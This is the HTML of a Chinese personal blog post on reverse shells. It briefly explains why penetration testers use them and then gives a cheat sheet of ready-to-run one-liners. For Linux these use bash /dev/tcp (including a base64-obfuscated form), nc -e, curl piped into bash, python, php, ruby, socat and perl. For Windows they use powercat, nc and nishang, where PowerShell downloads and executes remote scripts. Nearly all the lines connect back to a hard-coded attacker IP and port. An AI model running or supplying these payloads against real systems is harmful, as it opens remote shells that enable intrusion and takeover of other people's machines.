<!DOCTYPE html>
<html>
  <!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  
  <title>反弹shell - Mkey的博客</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0">
  
  <meta name="keywords" content=web-security>
  
    <meta name="description" content="学习与记录">
  
  
    <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=1.02">
  
  
    <link rel="alternate" href="/atom.xml " title="Mkey的博客" type="application/atom+xml">
  

  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 6.3.0"></head>
  <body>
    <div class="container">
      <header class="header">
  <div class="blog-title">
    <a href="/" class="logo">Mkey的博客</a>
    <div class="subtitle"></div>
  </div>
  <nav class="navbar">
    <ul class="menu">
      
        <li class="menu-item">
          <a href="/" class="menu-item-link">主页</a>
        </li>
      
        <li class="menu-item">
          <a href="/archives" class="menu-item-link">归档</a>
        </li>
      
        <li class="menu-item">
          <a href="/about" class="menu-item-link">关于</a>
        </li>
      
    </ul>
  </nav>
</header>
<article class="post">
  <div class="post-title">
    <h1 class="article-title">反弹shell</h1>
  </div>
   <div class="post-meta">
    <span class="post-time">2018-08-02</span>
  </div>
  <div class="post-content">
    <h1 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h1><p>控制端监听某TCP&#x2F;UDP端口，被控端发起请求到该端口，并将其命令行的输入输出转到控制端。reverse shell与telnet，ssh等标准shell对应，本质上是网络概念的客户端与服务端的角色反转。</p>
<p>为什么需要反弹shell？</p>
<p>反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中，往往因为端口限制而无法直连目标机器，此时需要通过反弹shell来获取一个交互式shell，以便继续深入。</p>
<h2 id="LINUX"><a href="#LINUX" class="headerlink" title="LINUX"></a>LINUX</h2><ol>
<li><p>bash反弹</p>
<p> <code>bash -i &gt;&amp; /dev/tcp/IP/prot 0&gt;&amp;1</code></p>
<p> 可以使用base64编码</p>
<p> <code>bash -c &#39;&#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTAyLzQ0NDQgMD4mMQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&#39;</code></p>
</li>
<li><p>nc反弹</p>
<p> <code>nc -e /bin/bash ip port</code><br> <code>-e</code>后面跟的参数代表的是在创建连接后执行的程序，这里代表在连接到远程后可以在远程执行一个本地shell(&#x2F;bin&#x2F;bash)，也就是反弹一个shell给远程，可以看到远程已经成功反弹到了shell，并且可以执行命令。</p>
</li>
<li><p>curl反弹</p>
<p> <code>curl ip/bash.html|bash</code></p>
<p> 将bash命令写入html，将文件命令输入bash执行</p>
</li>
<li><p>whois反弹<br> <code>whois -h ip -p port shell</code></p>
<p> 只能执行shell命令</p>
</li>
<li><p>python反弹<br> <code>python -c &#39;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;192.168.2.102&quot;,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#39;</code></p>
</li>
<li><p>PHP反弹<br> <code>php -r &#39;$sock=fsockopen(&quot;192.168.2.102&quot;,4444);exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#39;</code></p>
</li>
<li><p>ruby反弹<br> <code>ruby -rsocket -e&#39;f=TCPSocket.open(&quot;192.168.2.102&quot;,4444).to_i;exec sprintf(&quot;/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d&quot;,f,f,f)&#39;</code></p>
</li>
</ol>
<p>8.socat反弹<br>    <code>socat exec:&#39;bash -li&#39;,pty,stderr,setsid,sigint,sane tcp:192.168.2.102:4444</code></p>
<ol start="9">
<li>perl反弹<br> <code>perl -e &#39;use Socket;$i=&quot;192.168.2.102&quot;;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i))))&#123;open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/bin/sh -i&quot;);&#125;;&#39;</code></li>
</ol>
<h2 id="windows"><a href="#windows" class="headerlink" title="windows"></a>windows</h2><ol>
<li><p>powercat反弹<br> <code>System.Net.Webclient).DownloadString(&#39;https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1&#39;);powercat -c 192.168.2.103 -p 4444 -e cmd</code></p>
</li>
<li><p>nc反弹<br> <code>nc 192.168.2.103 4444 -e c:\windows\system32\cmd.exe</code></p>
</li>
<li><p>nishang反弹<br> <code>IEX (New-Object Net.WebClient).DownloadString(&#39;http://192.168.159.134/nishang/Shells/Invoke-PowerShellTcp.ps1&#39;);Invoke-PowerShellTcp -Reverse -IPAddress 192.168.2.103 -port 4444</code></p>
</li>
<li><p>reverse UDP shell</p>
 <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">IEX (New-Object Net.WebClient).DownloadString(&#x27;http://192.168.2.103/nishang/Shells/Invoke-PowerShellUdp.ps1&#x27;);</span><br><span class="line"></span><br><span class="line">Invoke-PowerShellUdp -Reverse -IPAddress 192.168.2.103 -port 4444</span><br></pre></td></tr></table></figure>
</li>
<li><p>msf反弹</p>
</li>
</ol>

  </div>
  <div class="post-footer">
    
      <ul class="post-tag-list" itemprop="keywords"><li class="post-tag-list-item"><a class="post-tag-list-link" href="/tags/web-security/" rel="tag">web-security</a></li></ul>
    

    <a href="#top" class="top">返回顶部</a>
  </div>
</article>
<footer>
  &copy; 2023
  <span class="author">
    HOU
  </span>
</footer>
    </div>
  </body>
</html>